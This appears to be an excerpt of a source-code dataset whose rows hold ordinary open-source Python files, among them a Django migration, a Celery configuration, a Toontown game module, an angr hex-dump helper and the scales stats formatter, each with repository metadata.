dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('cms_content', '0003_auto_20190719_1232'),
]
operations = [
migrations.AlterModelOptions(
name='element',
options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
),
migrations.AddField(
model_name='container',
name='content_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
),
migrations.AddField(
model_name='container',
name='object_id',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
),
]
| # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('cms_content', '0003_auto_20190719_1232'),
]
operations = [
migrations.AlterModelOptions(
name='element',
options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
),
migrations.AddField(
model_name='container',
name='content_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
),
migrations.AddField(
model_name='container',
name='object_id',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
),
]
| es | 0.128841 | 1.593518 | 2 |
original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 0 | 13580 | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: <NAME>
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
CELERY_ACCEPT_CONTENT= ['json']
CELERY_TASK_SERIALIZER= 'json'
CELERY_RESULT_SERIALIZER= 'json'
CELERY_ENABLE_UTC=True
CELERY_TIMEZONE='Asia/Taipei'
# CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
CELERYD_PREFETCH_MULTIPLIER=1
CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
CELERY_IGNORE_RESULT=True
CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
CELERY_TASK_CREATE_MISSING_QUEUES=False
CELERY_QUEUES = {
# Queue("default", routing_key = "default"),
# Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
Queue("H-queue1", routing_key = "high"),
Queue("L-queue1", routing_key = "low")
}
CELERY_TASK_ROUTES = {
'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
}
def readConfig():
import os, time
import ConfigParser
from app.globalvar import CONFIG as _CONFIG
try:
get_request_start_time = int(round(time.time()* 1000000))
if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass <PASSWORD>:<PASSWORD>'.format(str(get_request_start_time))) as osdecrypt:
osdecrypt.read()
CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
CONFIG = ConfigParser.ConfigParser()
CONFIG.read(CONFPATH)
dicConfig = {
"celery_broker":CONFIG.get('Celery', 'broker'),
"celery_result_backend":CONFIG.get('Celery', 'result_backend'),
"dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
"dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
"dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
"dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
}
return dicConfig
except Exception as e:
print "~~~~celery config error~~~~"
print e
return False
finally:
if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: <NAME>
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
CELERY_ACCEPT_CONTENT= ['json']
CELERY_TASK_SERIALIZER= 'json'
CELERY_RESULT_SERIALIZER= 'json'
CELERY_ENABLE_UTC=True
CELERY_TIMEZONE='Asia/Taipei'
# CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
CELERYD_PREFETCH_MULTIPLIER=1
CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
CELERY_IGNORE_RESULT=True
CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
CELERY_TASK_CREATE_MISSING_QUEUES=False
CELERY_QUEUES = {
# Queue("default", routing_key = "default"),
# Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
Queue("H-queue1", routing_key = "high"),
Queue("L-queue1", routing_key = "low")
}
CELERY_TASK_ROUTES = {
'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
}
def readConfig():
import os, time
import ConfigParser
from app.globalvar import CONFIG as _CONFIG
try:
get_request_start_time = int(round(time.time()* 1000000))
if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass <PASSWORD>:<PASSWORD>'.format(str(get_request_start_time))) as osdecrypt:
osdecrypt.read()
CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
CONFIG = ConfigParser.ConfigParser()
CONFIG.read(CONFPATH)
dicConfig = {
"celery_broker":CONFIG.get('Celery', 'broker'),
"celery_result_backend":CONFIG.get('Celery', 'result_backend'),
"dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
"dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
"dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
"dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
}
return dicConfig
except Exception as e:
print "~~~~celery config error~~~~"
print e
return False
finally:
if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | ceb | 0.330101 | 1.941023 | 2 |
toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 1 | 13581 | from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
def enter(self, requestStatus):
CogHQExterior.CogHQExterior.enter(self, requestStatus)
# Load the CogHQ DNA file:
dnaStore = DNAStorage()
dnaFileName = self.genDNAFileName(self.zoneId)
loadDNAFileAI(dnaStore, dnaFileName)
# Collect all of the vis group zone IDs:
self.zoneVisDict = {}
for i in range(dnaStore.getNumDNAVisGroupsAI()):
groupFullName = dnaStore.getDNAVisGroupName(i)
visGroup = dnaStore.getDNAVisGroupAI(i)
visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
visibles = []
for i in range(visGroup.getNumVisibles()):
visibles.append(int(visGroup.getVisible(i)))
visibles.append(ZoneUtil.getBranchZone(visZoneId))
self.zoneVisDict[visZoneId] = visibles
# Next, we want interest in all vis groups due to this being a Cog HQ:
base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| pt | 0.127213 | 2.074017 | 2 |
etsy_convos/convos/migrations/0005_convothread_last_message_at.py | jessehon/etsy-convos | 2 | 13582 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('convos', '0004_auto_20150511_0945'),
]
operations = [
migrations.AddField(
model_name='convothread',
name='last_message_at',
field=models.DateTimeField(null=True, verbose_name='Last message at', blank=True),
),
]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('convos', '0004_auto_20150511_0945'),
]
operations = [
migrations.AddField(
model_name='convothread',
name='last_message_at',
field=models.DateTimeField(null=True, verbose_name='Last message at', blank=True),
),
]
| fr | 0.176995 | 1.52433 | 2 |
pycoax/examples/40_eab.py | lowobservable/coax | 21 | 13583 | #!/usr/bin/env python
import sys
from itertools import chain
from common import open_example_serial_interface
from coax import read_feature_ids, parse_features, Feature, LoadAddressCounterHi, LoadAddressCounterLo, WriteData, EABWriteAlternate, EABLoadMask
def get_features(interface):
commands = read_feature_ids()
ids = interface.execute(commands)
return parse_features(ids, commands)
def eab_alternate_zip(regen_buffer, eab_buffer):
return bytes(chain(*zip(regen_buffer, eab_buffer)))
with open_example_serial_interface() as interface:
features = get_features(interface)
if Feature.EAB not in features:
sys.exit('No EAB feature found.')
eab_address = features[Feature.EAB]
print(f'EAB feature found at address {eab_address}')
# Protected Normal
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(80)])
regen_buffer = bytes.fromhex('e0 08 00 af 91 8e 93 84 82 93 84 83 00 ad 8e 91 8c 80 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Protected Intense
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(160)])
regen_buffer = bytes.fromhex('e8 08 00 af 91 8e 93 84 82 93 84 83 00 a8 8d 93 84 8d 92 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Normal EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(64)])
regen_buffer = bytes.fromhex('e0 08 00 ad 8e 91 8c 80 8b 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Blink EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(144)])
regen_buffer = bytes.fromhex('e0 08 00 a1 8b 88 8d 8a 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Reverse EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(224)])
regen_buffer = bytes.fromhex('e0 08 00 b1 84 95 84 91 92 84 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Underline EFA
interface.execute([LoadAddressCounterHi(2), LoadAddressCounterLo(48)])
regen_buffer = bytes.fromhex('e0 08 00 b4 8d 83 84 91 8b 88 8d 84 00 a4 a5 a0 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
| #!/usr/bin/env python
import sys
from itertools import chain
from common import open_example_serial_interface
from coax import read_feature_ids, parse_features, Feature, LoadAddressCounterHi, LoadAddressCounterLo, WriteData, EABWriteAlternate, EABLoadMask
def get_features(interface):
commands = read_feature_ids()
ids = interface.execute(commands)
return parse_features(ids, commands)
def eab_alternate_zip(regen_buffer, eab_buffer):
return bytes(chain(*zip(regen_buffer, eab_buffer)))
with open_example_serial_interface() as interface:
features = get_features(interface)
if Feature.EAB not in features:
sys.exit('No EAB feature found.')
eab_address = features[Feature.EAB]
print(f'EAB feature found at address {eab_address}')
# Protected Normal
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(80)])
regen_buffer = bytes.fromhex('e0 08 00 af 91 8e 93 84 82 93 84 83 00 ad 8e 91 8c 80 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Protected Intense
interface.execute([LoadAddressCounterHi(0), LoadAddressCounterLo(160)])
regen_buffer = bytes.fromhex('e8 08 00 af 91 8e 93 84 82 93 84 83 00 a8 8d 93 84 8d 92 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09')
interface.execute(WriteData(regen_buffer))
# Normal EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(64)])
regen_buffer = bytes.fromhex('e0 08 00 ad 8e 91 8c 80 8b 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Blink EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(144)])
regen_buffer = bytes.fromhex('e0 08 00 a1 8b 88 8d 8a 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Reverse EFA
interface.execute([LoadAddressCounterHi(1), LoadAddressCounterLo(224)])
regen_buffer = bytes.fromhex('e0 08 00 b1 84 95 84 91 92 84 00 a4 a5 a0 00 00 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
# Underline EFA
interface.execute([LoadAddressCounterHi(2), LoadAddressCounterLo(48)])
regen_buffer = bytes.fromhex('e0 08 00 b4 8d 83 84 91 8b 88 8d 84 00 a4 a5 a0 00 00 00 00 00 00 00 b7 bf 00 a1 bf 00 b1 bf 00 ac bf 00 a6 bf 00 a2 bf 00 b8 bf 00 b6 bf 00 00 09 e0')
eab_buffer = bytes.fromhex('c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 10 00 00 18 00 00 20 00 00 28 00 00 30 00 00 38 00 00 00 00 00')
interface.execute(EABWriteAlternate(eab_address, eab_alternate_zip(regen_buffer, eab_buffer)))
| pt | 0.200439 | 2.423584 | 2 |
ApkInstall/Case/TV/DeviceConnect.py | LiuTianen/PackManage | 0 | 13584 | # coding=utf-8
from Base.DevicesList import devicesList as dl
from Base.Common import Common
class DevicesConnect:
def deviceConnect(self):
commands = []
data = dl().get_Tv_IP()
for IP in data:
cmd = "adb connect %s" %(IP)
commands.append(cmd)
Common().loop_threads(commands)
if __name__ == '__main__':
DevicesConnect().deviceConnect()
| # coding=utf-8
from Base.DevicesList import devicesList as dl
from Base.Common import Common
class DevicesConnect:
def deviceConnect(self):
commands = []
data = dl().get_Tv_IP()
for IP in data:
cmd = "adb connect %s" %(IP)
commands.append(cmd)
Common().loop_threads(commands)
if __name__ == '__main__':
DevicesConnect().deviceConnect()
| ceb | 0.154836 | 2.439932 | 2 |
angr/storage/memory_mixins/hex_dumper_mixin.py | Kyle-Kyle/angr | 6,132 | 13585 | import string
from ...errors import SimValueError
from . import MemoryMixin
class HexDumperMixin(MemoryMixin):
def hex_dump(self, start, size, word_size=4, words_per_row=4, endianness="Iend_BE",
symbolic_char='?', unprintable_char='.', solve=False, extra_constraints=None,
inspect=False, disable_actions=True):
"""
Returns a hex dump as a string. The solver, if enabled, is called once for every byte
potentially making this function very slow. It is meant to be used mainly as a
"visualization" for debugging.
Warning: May read and display more bytes than `size` due to rounding. Particularly,
if size is less than, or not a multiple of word_size*words_per_line.
:param start: starting address from which to print
:param size: number of bytes to display
:param word_size: number of bytes to group together as one space-delimited unit
:param words_per_row: number of words to display per row of output
:param endianness: endianness to use when displaying each word (ASCII representation is unchanged)
:param symbolic_char: the character to display when a byte is symbolic and has multiple solutions
:param unprintable_char: the character to display when a byte is not printable
:param solve: whether or not to attempt to solve (warning: can be very slow)
:param extra_constraints: extra constraints to pass to the solver is solve is True
:param inspect: whether or not to trigger SimInspect breakpoints for the memory load
:param disable_actions: whether or not to disable SimActions for the memory load
:return: hex dump as a string
"""
if endianness == "Iend_BE":
end = 1
else:
end = -1
if extra_constraints is None:
extra_constraints = []
# round up size so that chop() works
line_size = word_size * words_per_row
size = size if size % line_size == 0 else size + line_size - size % line_size
raw_mem = super().load(start, size=size, inspect=inspect, disable_actions=disable_actions)
i = start
dump_str = ""
for line in raw_mem.chop(line_size * self.state.arch.byte_width):
dump = "%x:" % i
group_str = ""
for word in line.chop(word_size * self.state.arch.byte_width):
word_bytes = ""
word_str = ""
for byte_ in word.chop(self.state.arch.byte_width)[::end]:
byte_value = None
if not self.state.solver.symbolic(byte_) or solve:
try:
byte_value = self.state.solver.eval_one(
byte_,
extra_constraints=extra_constraints
)
except SimValueError:
pass
if byte_value is not None:
word_bytes += "%02x" % byte_value
if chr(byte_value) in string.printable[:-5]:
word_str += chr(byte_value)
else:
word_str += unprintable_char
else:
word_bytes += symbolic_char*2
word_str += symbolic_char
dump += ' ' + word_bytes
group_str += word_str[::end] # always print ASCII representation in little-endian
dump += ' ' + group_str
i += line_size
dump_str += dump + '\n'
return dump_str
| import string
from ...errors import SimValueError
from . import MemoryMixin
class HexDumperMixin(MemoryMixin):
    def hex_dump(self, start, size, word_size=4, words_per_row=4, endianness="Iend_BE",
                 symbolic_char='?', unprintable_char='.', solve=False, extra_constraints=None,
                 inspect=False, disable_actions=True):
        """
        Returns a hex dump as a string. The solver, if enabled, is called once for every byte
        potentially making this function very slow. It is meant to be used mainly as a
        "visualization" for debugging.

        Warning: May read and display more bytes than `size` due to rounding. Particularly,
        if size is less than, or not a multiple of word_size*words_per_row.

        :param start: starting address from which to print
        :param size: number of bytes to display
        :param word_size: number of bytes to group together as one space-delimited unit
        :param words_per_row: number of words to display per row of output
        :param endianness: endianness to use when displaying each word (ASCII representation is unchanged)
        :param symbolic_char: the character to display when a byte is symbolic and has multiple solutions
        :param unprintable_char: the character to display when a byte is not printable
        :param solve: whether or not to attempt to solve (warning: can be very slow)
        :param extra_constraints: extra constraints to pass to the solver if solve is True
        :param inspect: whether or not to trigger SimInspect breakpoints for the memory load
        :param disable_actions: whether or not to disable SimActions for the memory load
        :return: hex dump as a string
        """
        # Direction in which the bytes of each word are emitted: +1 keeps load
        # order (big-endian display), -1 reverses it (little-endian display).
        if endianness == "Iend_BE":
            end = 1
        else:
            end = -1
        if extra_constraints is None:
            extra_constraints = []
        # round up size so that chop() works
        line_size = word_size * words_per_row
        size = size if size % line_size == 0 else size + line_size - size % line_size
        raw_mem = super().load(start, size=size, inspect=inspect, disable_actions=disable_actions)
        i = start
        dump_str = ""
        for line in raw_mem.chop(line_size * self.state.arch.byte_width):
            dump = "%x:" % i
            group_str = ""
            for word in line.chop(word_size * self.state.arch.byte_width):
                word_bytes = ""
                word_str = ""
                for byte_ in word.chop(self.state.arch.byte_width)[::end]:
                    byte_value = None
                    if not self.state.solver.symbolic(byte_) or solve:
                        try:
                            byte_value = self.state.solver.eval_one(
                                byte_,
                                extra_constraints=extra_constraints
                            )
                        except SimValueError:
                            # No unique solution under the constraints: fall
                            # through and render the byte as symbolic.
                            pass
                    if byte_value is not None:
                        word_bytes += "%02x" % byte_value
                        # string.printable[:-5] drops the trailing whitespace /
                        # control characters (\t\n\r\x0b\x0c) but keeps ' '.
                        if chr(byte_value) in string.printable[:-5]:
                            word_str += chr(byte_value)
                        else:
                            word_str += unprintable_char
                    else:
                        # Two hex digits per byte, hence the doubled marker.
                        word_bytes += symbolic_char*2
                        word_str += symbolic_char
                dump += ' ' + word_bytes
                group_str += word_str[::end] # always print ASCII representation in little-endian
            dump += ' ' + group_str
            i += line_size
            dump_str += dump + '\n'
        return dump_str
| pt | 0.103146 | 2.947202 | 3 |
src/greplin/scales/formats.py | frenzymadness/scales | 273 | 13586 | # Copyright 2011 The scales Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Formatting methods for stats."""
from greplin import scales
import cgi
import six
import json
import operator
import re
OPERATORS = {
'>=': operator.ge,
'>': operator.gt,
'<': operator.lt,
'<=': operator.le,
'=': operator.eq,
'==': operator.eq,
'!=': operator.ne
}
OPERATOR = re.compile('(%s)' % '|'.join(list(OPERATORS.keys())))
def runQuery(statDict, query):
  """Return the subset of a stat tree matching the given query.

  A query is either a bare key name, or "key <op> value" where <op> is one of
  the comparison operators in OPERATORS.  Nested containers are searched
  recursively and kept only when they contain a match.
  """
  tokens = [token.strip() for token in OPERATOR.split(query)]
  assert len(tokens) in (1, 3)
  targetKey = tokens[0]
  matched = {}
  for key, value in six.iteritems(statDict):
    if key == targetKey:
      if len(tokens) == 3:
        compare = OPERATORS[tokens[1]]
        try:
          # Coerce the query operand to the stat's own type when possible.
          operand = type(value)(tokens[2]) if value else tokens[2]
        except (TypeError, ValueError):
          continue
        if not compare(value, operand):
          continue
      matched[key] = value
    elif isinstance(value, (scales.StatContainer, dict)):
      subtree = runQuery(value, query)
      if subtree:
        matched[key] = subtree
  return matched
def htmlHeader(output, path, serverName, query = None):
  """Write the shared HTML page header: title, styles, heading, filter form."""
  # The title shows the sub-path when rendering a nested status page.
  if path and path != '/':
    title = '<title>%s - Status: %s</title>' % (serverName, path)
  else:
    title = '<title>%s - Status</title>' % serverName
  output.write(title)
  output.write('''
<style>
  body,td { font-family: monospace }
  .level div {
    padding-bottom: 4px;
  }
  .level .level {
    margin-left: 2em;
    padding: 1px 0;
  }
  span { color: #090; vertical-align: top }
  .key { color: black; font-weight: bold }
  .int, .float { color: #00c }
</style>
''')
  output.write('<h1 style="margin: 0">Stats</h1>')
  output.write('<h3 style="margin: 3px 0 18px">%s</h3>' % serverName)
  filterForm = ('<p><form action="#" method="GET">Filter: '
                '<input type="text" name="query" size="20" value="%s"></form></p>') % (query or '')
  output.write(filterForm)
def htmlFormat(output, pathParts = (), statDict = None, query = None):
  """Render the given stats (or the global stats) as HTML on `output`.

  When `query` is supplied, only entries matching it are rendered.
  """
  stats = statDict or scales.getStats()
  if query:
    stats = runQuery(stats, query)
  _htmlRenderDict(pathParts, stats, output)
def _htmlRenderDict(pathParts, statDict, output):
  """Render a dictionary as a table - recursing as necessary.

  pathParts is the tuple of ancestor keys, used to build links for
  collapsed containers.  Callable stats are evaluated at render time;
  nested mappings recurse; collapsed StatContainers become links that are
  emitted after all inline entries.
  """
  keys = list(statDict.keys())
  keys.sort()
  links = []
  output.write('<div class="level">')
  for key in keys:
    keyStr = cgi.escape(_utf8str(key))
    value = statDict[key]
    if hasattr(value, '__call__'):
      # Callable stats are evaluated lazily, at render time.
      value = value()
    if hasattr(value, 'keys'):
      valuePath = pathParts + (keyStr,)
      if isinstance(value, scales.StatContainer) and value.isCollapsed():
        # Collapsed containers render as a link to their own status page.
        link = '/status/' + '/'.join(valuePath)
        links.append('<div class="key"><a href="%s">%s</a></div>' % (link, keyStr))
      else:
        output.write('<div class="key">%s</div>' % keyStr)
        _htmlRenderDict(valuePath, value, output)
    else:
      output.write('<div><span class="key">%s</span> <span class="%s">%s</span></div>' %
                   (keyStr, type(value).__name__, cgi.escape(_utf8str(value)).replace('\n', '<br/>')))
  if links:
    # Deferred: links to collapsed children go after the inline entries.
    for link in links:
      output.write(link)
  output.write('</div>')
def _utf8str(x):
  """Like str(x), but guarantees a UTF-8 byte string on Python 2."""
  if six.PY3:
    # Python 3 str is already unicode; no encoding needed.
    return str(x)
  if isinstance(x, six.text_type):
    return x.encode('utf-8')
  if isinstance(x, six.binary_type):
    return x
  return six.binary_type(x)
def jsonFormat(output, statDict = None, query = None, pretty = False):
  """Formats as JSON, writing to the given object.

  Uses the global stats when statDict is not given; `query` filters via
  runQuery; `pretty` enables 2-space indentation.
  """
  statDict = statDict or scales.getStats()
  if query:
    statDict = runQuery(statDict, query)
  indent = 2 if pretty else None
  # At first, assume that strings are in UTF-8. If this fails -- if, for example, we have
  # crazy binary data -- then in order to get *something* out, we assume ISO-8859-1,
  # which maps each byte to a unicode code point.
  try:
    serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent)
  except UnicodeDecodeError:
    # NOTE(review): json.dumps() only accepts an `encoding` keyword on
    # Python 2; on Python 3 this fallback raises TypeError -- confirm this
    # path is py2-only.
    serialized = json.dumps(statDict, cls=scales.StatContainerEncoder, indent=indent, encoding='iso-8859-1')
  output.write(serialized)
  output.write('\n')
| # Copyright 2011 The scales Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
